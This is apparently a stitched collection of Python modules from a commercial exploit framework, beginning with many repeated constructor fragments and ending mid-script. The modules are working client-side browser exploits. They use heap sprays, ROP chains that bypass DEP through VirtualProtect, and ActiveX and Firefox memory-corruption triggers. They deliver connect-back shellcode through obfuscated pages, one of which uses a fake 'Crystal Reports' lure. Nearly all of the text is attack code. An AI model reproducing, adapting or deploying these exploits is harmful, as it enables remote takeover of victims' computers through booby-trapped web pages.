def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".htm" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.vProtect = True self.useRawShellcode = True self.payloadFilename = "".join( [random.choice(string.lowercase) for x in range(8)]) + '.exe' self.sharefilename = "\\" + "".join( [random.choice(string.lowercase) for x in range(4)]) + "\\" + self.payloadFilename return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = "\x00\x09\x0d\x20\xff" #Randomize name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False #self.encode_printable = True self.alignstack = True #self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul" self.js_filename = self.filename[0:self.filename.index('.')] + ".js" self.trigger_name = "".join( [random.choice(string.uppercase) for x in range(8)]) # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True # Bad Chars: 80-9f (makes for extra fun) #self.badstring = "\x00\x09\x0d\x20\xff" self.badstring = "\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F" #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = '' # Shellcode is on heap or in dll #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # For IE7 .Net Shellcode self.vProtect = True self.pc = 0x44444444
def __init__(self): httpclientside.__init__(self) self.version=0 self.name=NAME self.filename=''.join([random.choice(string.uppercase) for x in range(8)])+'.html' # Set up our javascript obfuscator, this could be done in httpclientside class self.jsObfuscator=JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.plugin_info=None # we want clientd to give us a plugin dict self.nohttpmosdef = True #we don't have room for the large http mosdef shellcode...see maximum size in the #encoder notes. return
def __init__(self): httpclientside.__init__(self) self.version=0 self.name=NAME self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" # Set up our javascript obfuscator, this could be done in httpclientside class self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.language = "" #"en-us" # uncomment this to default to English version self.plugin_info = None # we want clientd to give us a plugin dict #HTTPMOSDEF shellcode is 2100 bytes or so - our shellcode space is 2044 or so. #XXX: We need to switch to SearchCode? self.nohttpmosdef = True return
def __init__(self): httpclientside.__init__(self) self.version = 0 self.name = NAME self.filename = self._get_random_filename() self.jsfilename = 'AC_RunActiveContent.js' self.swffilename = 'Resources/CVE_2011_2110/APSB11_18.swf' self.trojan_filename = self._get_random_filename(extension="txt") self.language = "" #"en-us" # uncomment this to default to English version self.plugin_info = None # we want clientd to give us a plugin dict self.refresh_rate = 30 self.xorer = XOR.new("\x5a") self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.supports_dns_mosdef = True
def __init__(self): tcpexploit.__init__(self) httpclientside.__init__(self) self.searchMethod = self.FindBrowser_FindAnyTag_CmpExtraInfo self.UserAgent = [("Mozilla/", "Firefox", "")] self.plugin_info = None # we want clientd to give us a plugin dict self.supports_dns_mosdef = False self.shellcode = "\xcc" * 298 self.setVersions() self.version = 1 self.badstring = "" self.name = NAME self.filename = "".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID")
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x28\x29\x2f\x3c\x3e\x5c" self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return
def __init__(self): httpclientside.__init__(self) self.version = 0 self.name = NAME self.setInfo(DESCRIPTION) self.filename = "".join([choice(ascii_lowercase) for x in range(8)]) + ".html" # Set up our javascript obfuscator, this could be done in httpclientside class self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # we want clientd to give us a plugin dict self.plugin_info = None return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.htmlfile = self.filename self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.jarfile = 'wp_oracle_java_jre7sunawt.jar' self.autoFind = False self.refresh_rate = 0 return
def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.badstring = ( "\x00\x22\x0a\x0d\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f" "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f") #Ranomisze name for clientd self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = '' # Shellcode is on heap or in dll #Randomise name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # For IE7 .Net Shellcode self.pc = 0x44444444 return def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE 6.0" in info_dict['user_agent']: self.log("WP> Target has MSIE 6.0") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] # it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() #self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self, ourhost): # Exploit file # 3F141EAE FFD6 CALL ESI #023F4855 33C0 XOR EAX,EAX #$023F4857 66:B8 0109 MOV AX,0901 #023F485B 03F0 ADD ESI,EAX #023F485D FFE6 JMP ESI filedata = """ <html> To view the report, please enable the Crystal Reports control in the bar above.<br> <object id='target' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object> <script> ret=''; for( counter=0; counter<=260; counter++) ret+=unescape('%u0101%u0101'); ret+=unescape('%u1eae%u3f14') + unescape('%uc033%ub866') + unescape('%u0901%uf003') + unescape('%ue6ff%u9090'); target.ServerResourceVersion = ret; target.URL="OURURL"; target.CancelPrinting(); </script> <br><a href=javascript:window.close();>Close this report</a> </html> """ filedata = filedata.replace( 'OURURL', ourhost + "/" + self.filename.replace('.html', '.dll')) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit html file') ourhost = "http://" + clientheader.getStrValue(['Host']) data = self.makefile(ourhost) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): self.log('WP> Serving shellcode buffer') data = "\x90" * 2000 + self.shellcode if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') self.log('WP> ****************************************') return h, b def run(self): filedata = self.makefile('') outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % outputfile) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] DEFAULT_PAYLOAD = 1 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, returns a value used to rank the exploit within attacking modules """ Check for IE 6 """ self.isClientD = True if "MSIE 6.0" in info_dict['user_agent']: self.log("WP> Target has MSIE 6") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if self.isClientD: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def buildBypass(self, search=False): depBp = pack('<L', 0x1F701F31) # pop eax depBp += pack('<L', 0x1F72E644) # writeable depBp += pack('<L', 0x10034C91) # xor ecx, ecx depBp += pack('<L', 0x1F701F31) # pop eax depBp += pack('<L', 0xFFFFFFC0) depBp += pack('<L', 0x1001862A) # neg eax depBp += pack('<L', 0x1002E3C9) # xchg ecx, eax depBp += wp_randomstring(4) depBp += pack('<L', 0x1F70A7CC) # pop edx depBp += wp_randomstring(12) depBp += pack('<L', 0xFFFFEFFF) depBp += pack('<L', 0x100281E6) # neg edx depBp += wp_randomstring(8) depBp += pack('<L', 0x1001DBA6) # mov eax, edx / ret 4 depBp += wp_randomstring(16) depBp += pack('<L', 0x10017D50) # pop esi depBp += wp_randomstring(4) depBp += pack('<L', 0x10024B73) # pop esi / pop edi depBp += pack('<L', 0x10030F5A) # mov ebx, eax / call esi depBp += pack('<L', 0x1F711346) # edi - pop eax / ret depBp += pack('<L', 0x10017D50) # pop esi depBp += pack('<L', 0x1003B0E4) # VirtualProtect if search: depBp += pack('<L', 0x1F701F31) # pop eax depBp += pack('<L', 0xFFFFF7FF) # -801 depBp += pack('<L', 0x1002B5B2) # add ebx, eax depBp += pack('<L', 0x1001063C) # pop ebp depBp += pack('<L', 0x1F707DAE) # ebp - call [eax] / ret depBp += pack('<L', 0x1F701F31) # pop eax depBp += pack('<L', 0x1001049A) # push esp / ret 8 depBp += pack('<L', 0x10037D4B) # pushad depBp += "\x83\xEC\x05" # sub esp, 5 return depBp def makefile(self): self.log("WP> Generating Universal DEP Bypass") searchBypass = self.buildBypass(search=True) self.log("WP> Universal DEP Bypass Size: %s bytes" % len(searchBypass)) searchcode = wp_SearchCode(True, "mov $0x01991111, %edx") self.shellcode = self.shellcode[:17] + "\x8B\xE0" + self.shellcode[19:] randomStr = "".join( [random.choice(string.lowercase) for x in range(8)]) payload = wp_randomstring(628) payload += pack('<L', 0x1F7052F6) # add esp, 7D0 payload += wp_randomstring(364) payload += pack('<L', 0x1F701029) * 10 payload += searchBypass payload += searchcode payload += wp_randomstring((4096 - len(payload))) payload += 'c00kc00k' payload += self.buildBypass() payload += self.shellcode payload += wp_randomstring((10741 - len(payload))) #Base filedata filedata = """<html> <object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target'/></object> <script language='javascript'> arg1 = "RANDOMSTR"; arg2 = "PAYLOAD"; target.ValidateUser(arg1, arg2); </script> </html> """ filedata = filedata.replace('RANDOMSTR', randomStr) filedata = filedata.replace('PAYLOAD', payload) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) #self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data = self.makefile() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): filedata = self.makefile() outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (outputfile)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s########################################################### PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] # Clienside exploits default to HTTPMosdef PLAIN DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False #self.encode_printable = True self.alignstack = True #self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul" self.js_filename = self.filename[0:self.filename.index('.')] + ".js" self.trigger_name = "".join( [random.choice(string.uppercase) for x in range(8)]) # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, returns a value used to rank the exploit within attacking modules """ Check for Firefox """ self.isClientD = True if "Firefox/3.6" in info_dict['user_agent']: self.log("WP> Target has Firefox/3.6") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() #self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makeXUL(self): # make the XUL file filedata = """<?xml version="1.0"?> <?xml-stylesheet type="text/css"?> <window id="example-window" xmlns:html="http://www.w3.org/1999/xhtml" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <html:p> Please wait for page to load.... </html:p> <script src="JS_FILENAME"/> <tree id="treeset" onselect="TRIGGER_NAME();" rows="6" flex="1"> <treecols> <treecol id="firstname" label="." primary="true" flex="3"/> </treecols> <treechildren> <treeitem container="true" open="true"> <treerow> <treecell label="."/> </treerow> </treeitem> </treechildren> </tree> </window> """ filedata = filedata.replace('JS_FILENAME', self.js_filename) filedata = filedata.replace('TRIGGER_NAME', self.trigger_name) outputfile = wp_outputpath(self.xul_filename) self.log("WP> Opening XUL file %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() return filedata def makeJS(self, type): if type == 1: sprayaddr = pack( '<L', 0x12001000) # spray addr + pr nopslide to DEP bypass sprayaddr += pack('<L', 0x7C341111) h2sflip = pack('<L', 0x7C34E7BA) # heap -> stack flip print len(self.shellcode) + 8198 depBypass = self.wp_sayonaraASLRDEPBypass( (len(self.shellcode) + 8198)) else: sprayaddr = pack( '<L', 0x0a001000) # spray addr + pr nopslide to DEP bypass sprayaddr += pack('<L', 0x77C1F815) h2sflip = pack('<L', 0x77C3A634) # heap -> stack flip depBypass = self.wp_UniversalDEPBypassWinXP_VP( (len(self.shellcode) + 8198)) filedata = """ function TRIGGER_NAME() { var sel = document.getElementById('treeset').view.selection; sel.tree = { invalidateRange: function(s,e) { sel.tree = null; sel.clearSelection(); var container = new Array(); var addr = unescape("SPRAYADDY"); var pad = unescape("PADDING"); var big = addr; while (big.length < 0x38) big += addr big += unescape("H2SFLIP"); big += unescape("DEPBYPASS"); big += unescape("SHELLCODE"); while (big.length < 0x50000) big += big; big=big.substring(0,0x50000); var len = big.length - pad.length - 1; for (i = 0; i < 400; ++i) container.push(big.substring(0, len) + pad); } } } function TIMER() { var tree = document.getElementById('treeset'); tree.selected=true; tree.focus(); tree.view.selection.select(0); alert("Waiting?"); } setTimeout("TIMER()",2000); """ filedata = filedata.replace('TRIGGER_NAME', self.trigger_name) filedata = filedata.replace('H2SFLIP', wp_urluencode(h2sflip)) filedata = filedata.replace('SPRAYADDY', wp_urluencode(sprayaddr)) filedata = filedata.replace('PADDING', wp_urluencode(wp_randomstring(8))) filedata = filedata.replace('DEPBYPASS', wp_urluencode(depBypass)) filedata = filedata.replace( 'SHELLCODE', wp_urluencode( wp_randomnops(8192, self.badstring) + "\x81\xC4\x06\x20\x00\x00" + self.shellcode + (wp_randomstring(100)))) filedata = filedata.replace('TIMER', wp_randomstring(10)) outputfile = wp_outputpath(self.js_filename) self.log("WP> Opening .JS file %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() return filedata def makeHTML(self, type): filedata = "" if type == 1: filedata = """<embed type="application/x-java-applet" code="jreVerify.class" codebase="/jsp_utils/" width="1" height="2" jumpto="/en/download/installed.jsp?" pause="2000" /> """ filedata += """<script>document.location="XUL_FILENAME"</script>""" filedata = filedata.replace('XUL_FILENAME', self.xul_filename) outputfile = wp_outputpath(self.filename) self.log("WP> Opening HTML file %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() return filedata def makefile(self, browser, osversion): self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul" self.js_filename = self.filename[0:self.filename.index('.')] + ".js" if osversion == "Windows XP": self.log('WP> Generating Windows XP Universal exploit') self.makeHTML(0) self.makeXUL() self.makeJS(0) else: self.log('WP> Generating Windows Universal ASLR + DEP Exploit') self.makeHTML(1) self.makeXUL() self.makeJS(1) return def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') if clientheader.URL.count(self.filename): if cookies.count("SessionID"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" b.setBody(data) h.addHeader('Content-Type', 'text/html') else: self.log('WP> Serving exploit html file %s' % self.filename) if osversion == "Windows XP": data = self.makeHTML(0) else: data = self.makeHTML(1) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif clientheader.URL.count(self.xul_filename): self.log('WP> Serving exploit XUL file %s' % self.xul_filename) data = self.makeXUL() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'application/vnd.mozilla.xul+xml') elif clientheader.URL.count(self.js_filename): self.log('WP> Serving exploit .js file %s' % self.js_filename) if osversion == "Windows XP": data = self.makeJS(0) else: data = self.makeJS(1) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'application/x-javascript') elif clientheader.URL.count("favicon.ico"): self.log('WP> Serving blank icon') b.setBody("") else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): if self.version == 1: self.makefile("", "") else: self.makefile("Windows XP", "") self.log("WP> Output complete") return 1
class theexploit(wp_exploit, httpclientside): PAYLOADS = ["IE Inject Connect Back"] DEFAULT_PAYLOAD = 0 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.alignstack = True self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = "\x00\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): """ Check for IE """ self.isClientD = True if "Firefox/9" in info_dict['user_agent']: self.log("WP> Target has Firefox/9") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 elif "Firefox/8" in info_dict['user_agent']: self.log("WP> Target has Firefox/8") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 self.wp_getShellcodeType() if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile2003(self): sprayaddr = pack('<L', 0x0C101C0C) # spray addr sprayaddr += pack('<L', 0x77BABF55) # pop - XP depSc = pack('<L', 0x77BCB802) depSc += self.wp_UniversalDEPBypassWin2k3_VP( (len(self.shellcode) + 16)) depSc += self.shellcode depSc += wp_randomstring(2432 - len(depSc)) filedata = """<html> <head> <script> var shellcode = unescape("PAYLOAD"); var targetsize = 0x40000; var offset_length = 0x606; for (var i=0; i < 0x800; i++) { var randomnumber1=Math.floor(Math.random()*90)+10; var randomnumber2=Math.floor(Math.random()*90)+10; var randomnumber3=Math.floor(Math.random()*90)+10; var randomnumber4=Math.floor(Math.random()*90)+10; var paddingstr = "%u" + randomnumber1.toString() + randomnumber2.toString(); paddingstr += "%u" + randomnumber3.toString() + randomnumber4.toString(); var padding = unescape(paddingstr); while (padding.length < 0x1000) padding+= padding; junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + shellcode; single_sprayblock += padding.substring(0,0x800 - offset_length - shellcode.length); while (single_sprayblock.length < targetsize) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (targetsize-6)/2); varname = "var" + randomnumber1.toString() + randomnumber2.toString(); varname += randomnumber3.toString() + randomnumber4.toString(); thisvarname = "var " + varname + "= '" + sprayblock +"';"; eval(thisvarname); } function run() { var attr = document.createAttribute("foo"); attr.value = "bar"; var ni = document.createNodeIterator( attr, NodeFilter.SHOW_ALL, {acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }} ,false); ni.nextNode(); ni.nextNode(); ni.previousNode(); attr.value = null; const addr = unescape("RANDPAD"); var container = new Array(); var small = unescape("SPRAYADDR"); while (small.length != 30) small += addr; for (i = 0; i < 1024*1024*2; ++i) container.push(unescape(small)); ni.referenceNode; } </script> </head> <body onload="run();"> </body> </html> """ filedata = filedata.replace('PAYLOAD', wp_urluencode(depSc)) filedata = filedata.replace('SPRAYADDR', wp_urluencode(sprayaddr)) filedata = filedata.replace('RANDPAD', wp_urluencode(wp_randomstring(4))) return filedata def makefileXP(self): sprayaddr = pack('<L', 0x0C101C0C) sprayaddr += pack('<L', 0x77C1BB36) # pop - XP depSc = pack('<L', 0x77C3A634) depSc += self.wp_UniversalDEPBypassWinXP_VP((len(self.shellcode) + 8)) depSc += self.shellcode depSc += wp_randomstring(2432 - len(depSc)) filedata = """<html> <head> <script> var shellcode = unescape("PAYLOAD"); var targetsize = 0x40000; var offset_length = 0x606; for (var i=0; i < 0x800; i++) { var randomnumber1=Math.floor(Math.random()*90)+10; var randomnumber2=Math.floor(Math.random()*90)+10; var randomnumber3=Math.floor(Math.random()*90)+10; var randomnumber4=Math.floor(Math.random()*90)+10; var paddingstr = "%u" + randomnumber1.toString() + randomnumber2.toString(); paddingstr += "%u" + randomnumber3.toString() + randomnumber4.toString(); var padding = unescape(paddingstr); while (padding.length < 0x1000) padding+= padding; junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + shellcode; single_sprayblock += padding.substring(0,0x800 - offset_length - shellcode.length); while (single_sprayblock.length < targetsize) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (targetsize-6)/2); varname = "var" + randomnumber1.toString() + randomnumber2.toString(); varname += randomnumber3.toString() + randomnumber4.toString(); thisvarname = "var " + varname + "= '" + sprayblock +"';"; eval(thisvarname); } function run() { var attr = document.createAttribute("foo"); attr.value = "bar"; var ni = document.createNodeIterator( attr, NodeFilter.SHOW_ALL, {acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }} ,false); ni.nextNode(); ni.nextNode(); ni.previousNode(); attr.value = null; const addr = unescape("RANDPAD"); var container = new Array(); var small = 